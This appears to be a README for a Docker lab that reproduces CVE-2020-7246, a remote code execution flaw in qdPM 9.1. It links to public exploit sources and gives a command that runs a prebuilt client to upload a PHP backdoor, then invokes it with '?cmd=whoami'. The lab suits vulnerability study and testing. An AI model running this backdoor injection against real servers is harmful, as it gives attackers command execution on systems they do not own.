CVE-2020-7246

CVE-2020-7246

About

• https://nvd.nist.gov/vuln/detail/CVE-2020-7246

PoC / Exploit

• https://docs.google.com/document/d/13ZZSm0DL1Ie6r_fU5ZdDKGZ4defFqiFXMG--zDo8S10/edit
• https://www.exploit-db.com/exploits/47954

Environment used

• Ubuntu 18.04 LTS
• qdPM 9.1

Requirements

• docker
• docker-compose

Reproduction

Commands to build the environment

docker-compose up 

• Browse into http://SERVER_IP:8000/ and press "Database Config"
• In Database Config change the Database host to cve20207246_db_1 DB username to teste, DB password to teste, then press Install Database
• Choose a password for the admin account and them press save
• Press Login As Administrator
• In the login menu use [email protected] as username and the password is the one used above
• After login press Add User and change the following:
  • Fullname: teste
  • Password: teste
  • Email: [email protected]
• Press save

In the terminal execute the following command to inject malicious php file

docker run --rm simaofsilva/cve-2020-7246-client -url <SERVER_IP>:8000 -u [email protected] -p teste

• Next open the browser on the following link: http://SERVER_IP:8000//uploads/users/
• Select one of the php files of the format *-backdoor.php, getting a url in the format of http://SERVER_IP:8000//uploads/users/*-backdoor.php
• Add the ?cmd=whoami at the end of the url and www-data should appear as the response